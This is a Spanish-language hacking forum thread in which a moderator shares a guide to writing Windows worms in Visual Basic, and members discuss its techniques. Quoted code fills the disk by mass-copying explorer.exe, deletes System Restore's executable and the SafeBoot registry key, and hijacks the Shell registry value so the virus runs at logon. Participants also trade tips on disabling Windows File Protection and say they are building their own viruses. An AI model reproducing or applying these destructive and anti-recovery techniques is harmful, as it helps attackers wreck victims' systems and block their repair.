hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
11 de Octubre de 2008, 04:24:09
Noticias: La segunda fase del torneo de matemáticas ya ha empezado!!
Para ver este enlace Registrate o Inicia Sesion
ver

+  Foros pOrtal Hacker
|-+  Programacion
| |-+  Programación en general
| | |-+  Visual Basic (Moderadores: ranefi, crypto136, ziBboh, >> s E t H <<)
| | | |-+  Guia de creacion de worms
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] 2  Todos Ir Abajo Imprimir
Autor Tema: Guia de creacion de worms  (Leído 1261 veces)
>> s E t H <<
Moderador
*****
Desconectado Desconectado

Mensajes: 1,419


jelou guorld


Ver Perfil WWW
« : 06 de Noviembre de 2007, 04:36:48 »

primera vez que hago algo xD

edito y dejo el indice (gracias binary)

Indice
Antes de empezar algunas cosas importantes
1- Introducción
   1.1- Caraterísticas de los virus informáticos y sus similitudes con los virus biológicos
   1.2- Historia de un virus
2- Un poco de orden
   2.1- Módulos: ¡no están solo para declarar variables globales!
   2.2- Orden temporal
3- Ejecutando comandos del CMD y BATCH
   3.1- Ejecutando comandos del MS-DOS
   3.2- Creando y ejecutando BATs
4- El registro de Windows
   4.1- ¿Que es el registro?
   4.2- El editor del registro
   4.3- Operando con el registro desde VB
5- Cosas basicas
   5.1- Ocultación
   5.2- Encontrando el directorio de Windows
   5.3- Pasando desapercibidos
   5.4- Instalando el virus
6- Firmas en el PC
   6.1- El propietario del SO
   6.2- Creando archivos de texto
   6.3- Internet Explorer
7- Dificultando la desinfección
   7.1- Administrador de tareas
   7.2- Editor de registro
   7.3- Restaurar sistema, modo a prueba de fallos y creador de backup's
8- La parte destructiva
   8.1- Cuando va a causar daños
   8.2- Borrando archivos al azar
   8.3- El registro
   8.4- Archivos importantes
   8.5- Llenando el disco duro
Extras
   Extra 1: Creando backup del registro
   Extra 2: Recuperando el registro con un backup
Despedida
   Posibles temas a tratar en la parte 2
   Creditos


ojala les sirva, sobre todo a los newbies... dejen sus opinionis


descarga:

Para ver este enlace Registrate o Inicia Sesion
PD: se abre con el abiword
« Última modificación: 08 de Noviembre de 2007, 05:07:50 por >> s E t H << » En línea


Para ver este enlace Registrate o Inicia Sesion
MI FIRMA Tongue



Para ver este enlace Registrate o Inicia Sesion
Indice de posts interesantes de VB... manuales, guias, dudas, etc


Para ver este enlace Registrate o Inicia Sesion
tenes ideas para el foro de VB? postealas aca


Para ver este enlace Registrate o Inicia Sesion
libreria de codigo en VB!


Para ver este enlace Registrate o Inicia Sesion
IDE's, compiladores, interpretes, etc!

*seth informa que quiere ver el foro de VX


Para ver este enlace Registrate o Inicia Sesion
¡ENTRA EN MI BLOG O TE JUANKEO!

Krosty_ufc
NZ2
**
Desconectado Desconectado

Mensajes: 286


Payaso demente


Ver Perfil WWW
« Respuesta #1 : 07 de Noviembre de 2007, 12:15:57 »

Tengo que felicitarte porque esta muy buena la guia  Grin cool

Te hago una preg.

En esta parte del code:

Código:
On Error Resume Next
MkDir RutaWindows & "\system32\sytemconfig" 'el directorio "principal"
Dim cant
For cant = 1 To 1E+29  'la cantidad de directorios
Dim Direct As String
Direct = RutaWindows & "\system32\sytemconfig\sytemconfig" & cant
MkDir Direct  'creamos un subdirectorio
Dim count
For count = 1 To 1000  'la cantidad de archivos x directorio
FileCopy RutaWindows & "\explorer.exe", Direct & "\" & count 'copiamos los archivos
DoEvents  'dejamos descansar la computadora
Next
Next
      

Esto que seria
Citar
1 To 1E+29
osea porq pones 1e+29 :S me perdi.

Y el "do events" que hace exactamente ?

Eso es todo

Espero la 2da parte.

Gracias por la guia.

Salu2      
En línea

>> s E t H <<
Moderador
*****
Desconectado Desconectado

Mensajes: 1,419


jelou guorld


Ver Perfil WWW
« Respuesta #2 : 08 de Noviembre de 2007, 03:18:10 »

gracias Smiley
el doevents deja "un respiro al pc" osea, es para que no consuma tantos recursos
el "1E+29" te lo cambia automaticament e cuando pones un numero muy grando (por ejemplo 99999999999999 99999999), tene una explicacion mas larga pero no me acuerdo xD
la segunda parte es mucho mas dificil de escribir porque explique casi todo lo basico en la 1 xD
En línea


Para ver este enlace Registrate o Inicia Sesion
MI FIRMA Tongue



Para ver este enlace Registrate o Inicia Sesion
Indice de posts interesantes de VB... manuales, guias, dudas, etc


Para ver este enlace Registrate o Inicia Sesion
tenes ideas para el foro de VB? postealas aca


Para ver este enlace Registrate o Inicia Sesion
libreria de codigo en VB!


Para ver este enlace Registrate o Inicia Sesion
IDE's, compiladores, interpretes, etc!

*seth informa que quiere ver el foro de VX


Para ver este enlace Registrate o Inicia Sesion
¡ENTRA EN MI BLOG O TE JUANKEO!

Zion_Tm
NZ2
**
Desconectado Desconectado

Mensajes: 164


" Pensar no hace daño "


Ver Perfil
« Respuesta #3 : 16 de Noviembre de 2007, 01:36:14 »

No lo pude ver con ese programa pues hace 20 dias estoy con Linux, podes copiarlo en un .doc  o  txt y subirlo a rapidshare ? gracias
En línea

Conocimiento - Creatividad - Dedicacion - Investigacion - Mente abierta. *** El poder esta en vos ***
Krosty_ufc
NZ2
**
Desconectado Desconectado

Mensajes: 286


Payaso demente


Ver Perfil WWW
« Respuesta #4 : 16 de Noviembre de 2007, 03:40:24 »


Para ver este enlace Registrate o Inicia Sesion
http://usuarios.lycos.es/videofiesta//tutos/Cursos%20de%20Aprendizaje/Programacion/


Bajate el doc
En línea

Zion_Tm
NZ2
**
Desconectado Desconectado

Mensajes: 164


" Pensar no hace daño "


Ver Perfil
« Respuesta #5 : 17 de Noviembre de 2007, 01:39:46 »

Gracias Krosty_ufc  , muy bue manual >> s E t H << ,  te felicito , tengo un par de opiniones sobre el mismo.

esta linea     Kill RutaWindows & "\System32\restore\rstrui.exe 
ya la habia probado hace tiempo, pero el sistema lo recupera automaticament e. Lo que hay que hacer previamente es deshabilitar la proteccion de los archivos del sistema, creo que se llama WFP ( Windows File Protection ) asi luego si podemos eliminar el rstrui.exe y no lo va a poder recuperar.

Ahora si me parece muy util es esta linea   El_Objeto.regd elete "HKEY_LOCAL_MAC HINE\System\CurrentControlSet\Control\SafeBoot
todos sabemos que el ataque de virus se resuelve desde el modo a prueba de fallos, si funciona esto seria Genialofilo  toma-xD

El resto esta muyyy interesante, yo le agregaria tambien un bat para cerrarle la sesion y meterle ontraseña de usuario y de administrador, por las dudas si quiere meter el disco como esclavo y salvar su informacion jejejejjee

Sin mas ..  . .Felicidades  cool
En línea

Conocimiento - Creatividad - Dedicacion - Investigacion - Mente abierta. *** El poder esta en vos ***
-SharK_90-
Colaborador
****
Desconectado Desconectado

Mensajes: 661


NO SPAM


Ver Perfil WWW
« Respuesta #6 : 17 de Noviembre de 2007, 03:25:50 »

Alguien ya lo ha probado.. y puede confirmar si esto funciona??

Citar
Ahora si me parece muy util es esta linea   El_Objeto.regd elete "HKEY_LOCAL_MAC HINE\System\CurrentControlSet\Control\SafeBoot

La verdad, es muy interesante.! Yo ahora estoy haciendo un Virus (Va a ser, super potente).. y estuve buscando, como deshabilitar el Modo a prubas de fallo y esto es lo único q encontré.
Si que me gustaría saber si alguien ya lo probó.!

PD: Muy buen manual, bastante completo y bien desarrollado. gracias
SALu2--
En línea


Para ver este enlace Registrate o Inicia Sesion
ALOJAMIENTO WEB GRATIS... MUY BUENO. 350MB
Krosty_ufc
NZ2
**
Desconectado Desconectado

Mensajes: 286


Payaso demente


Ver Perfil WWW
« Respuesta #7 : 18 de Noviembre de 2007, 04:12:21 »

Citar
Yo ahora estoy haciendo un Virus (Va a ser, super potente)
Yo habia echo uno, que entre lo mas deestacado:
Se propagaba por msn, bloqueaba el regedit, el msconfig el task manager.
Si de alguna manera lograba habilitar el regedit, a la hora de abrirlo, este se cerraba y se volvia a bloquear, y otras cosas XD
Estaba interesante lo de que cerraba el regedit y lo bloqueaba, si podia llegar a desbloquearlo.
Salu2
En línea

>> s E t H <<
Moderador
*****
Desconectado Desconectado

Mensajes: 1,419


jelou guorld


Ver Perfil WWW
« Respuesta #8 : 18 de Noviembre de 2007, 04:27:28 »

lo del modo a prueba de fallos lo saque de este mismo foro, pero lo del reemplazar el cmd con el notepad lo encontre yo

lo del wfp lo voy a aeriguar y lo de los batch viene en la segunda parte

PD: si alguien tiene ganas de ayudar con lo de la propagacion bienvenido Smiley
En línea


Para ver este enlace Registrate o Inicia Sesion
MI FIRMA Tongue



Para ver este enlace Registrate o Inicia Sesion
Indice de posts interesantes de VB... manuales, guias, dudas, etc


Para ver este enlace Registrate o Inicia Sesion
tenes ideas para el foro de VB? postealas aca


Para ver este enlace Registrate o Inicia Sesion
libreria de codigo en VB!


Para ver este enlace Registrate o Inicia Sesion
IDE's, compiladores, interpretes, etc!

*seth informa que quiere ver el foro de VX


Para ver este enlace Registrate o Inicia Sesion
¡ENTRA EN MI BLOG O TE JUANKEO!

>> s E t H <<
Moderador
*****
Desconectado Desconectado

Mensajes: 1,419


jelou guorld


Ver Perfil WWW
« Respuesta #9 : 20 de Noviembre de 2007, 03:22:55 »

Ya encontre la solucion al wfp Smiley
gracias a microsoft, en su pagina hay una buena explicacion de como trabaja y donde esta el backup


Para ver este enlace Registrate o Inicia Sesion

en la segunda parte va a aparecer
En línea


Para ver este enlace Registrate o Inicia Sesion
MI FIRMA Tongue



Para ver este enlace Registrate o Inicia Sesion
Indice de posts interesantes de VB... manuales, guias, dudas, etc


Para ver este enlace Registrate o Inicia Sesion
tenes ideas para el foro de VB? postealas aca


Para ver este enlace Registrate o Inicia Sesion
libreria de codigo en VB!


Para ver este enlace Registrate o Inicia Sesion
IDE's, compiladores, interpretes, etc!

*seth informa que quiere ver el foro de VX


Para ver este enlace Registrate o Inicia Sesion
¡ENTRA EN MI BLOG O TE JUANKEO!

xhc
Recien llegado
*
Desconectado Desconectado

Mensajes: 14


Ver Perfil
« Respuesta #10 : 02 de Diciembre de 2007, 09:22:10 »

enhorabuena por el manual >> s E t H << , esta muy bien explicado  Grin
ya estoy esperando la segunda parte xD

saludos cool
En línea
>> s E t H <<
Moderador
*****
Desconectado Desconectado

Mensajes: 1,419


jelou guorld


Ver Perfil WWW
« Respuesta #11 : 03 de Diciembre de 2007, 04:07:06 »

enhorabuena por el manual >> s E t H << , esta muy bien explicado  Grin
ya estoy esperando la segunda parte xD

saludos cool

si hay suerte lo trae paap noel, si no para el dia del niño xD
En línea


Para ver este enlace Registrate o Inicia Sesion
MI FIRMA Tongue



Para ver este enlace Registrate o Inicia Sesion
Indice de posts interesantes de VB... manuales, guias, dudas, etc


Para ver este enlace Registrate o Inicia Sesion
tenes ideas para el foro de VB? postealas aca


Para ver este enlace Registrate o Inicia Sesion
libreria de codigo en VB!


Para ver este enlace Registrate o Inicia Sesion
IDE's, compiladores, interpretes, etc!

*seth informa que quiere ver el foro de VX


Para ver este enlace Registrate o Inicia Sesion
¡ENTRA EN MI BLOG O TE JUANKEO!

xhc
Recien llegado
*
Desconectado Desconectado

Mensajes: 14


Ver Perfil
« Respuesta #12 : 11 de Diciembre de 2007, 08:42:44 »

hola, tengo una duda en la parte de añadirse al registro en Shell:

para que se ejecute explorer.exe y tambien el virus, tendria que modificarla asi: Environ("SYSTEMROOT") & "/SYSTEM32/kernel32.exe" & Explorer.exe??

saludos
En línea
>> s E t H <<
Moderador
*****
Desconectado Desconectado

Mensajes: 1,419


jelou guorld


Ver Perfil WWW
« Respuesta #13 : 13 de Diciembre de 2007, 03:05:23 »

hola, tengo una duda en la parte de añadirse al registro en Shell:

para que se ejecute explorer.exe y tambien el virus, tendria que modificarla asi: Environ("SYSTEMROOT") & "/SYSTEM32/kernel32.exe" & Explorer.exe??

saludos

con probar no se pierde nada.. pero la idea que di no es esa:
es poner ahi el virus y que este llame al explorer.exe con
shell rutawindows & "\explorer.exe"
En línea


Para ver este enlace Registrate o Inicia Sesion
MI FIRMA Tongue



Para ver este enlace Registrate o Inicia Sesion
Indice de posts interesantes de VB... manuales, guias, dudas, etc


Para ver este enlace Registrate o Inicia Sesion
tenes ideas para el foro de VB? postealas aca


Para ver este enlace Registrate o Inicia Sesion
libreria de codigo en VB!


Para ver este enlace Registrate o Inicia Sesion
IDE's, compiladores, interpretes, etc!

*seth informa que quiere ver el foro de VX


Para ver este enlace Registrate o Inicia Sesion
¡ENTRA EN MI BLOG O TE JUANKEO!

xhc
Recien llegado
*
Desconectado Desconectado

Mensajes: 14


Ver Perfil
« Respuesta #14 : 13 de Diciembre de 2007, 08:11:33 »

si no probe porque si al iniciar no se arrancaba el explorer...el disco duro es nuevo y no quiero joderlo como lo hice antes Wink
vamos que tendria que añadirlo y despues poner shell rutawindows & "\explorer.exe" (yo prefiero environ("SYSTEMROOT") no?
En línea
Páginas: [1] 2  Todos Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online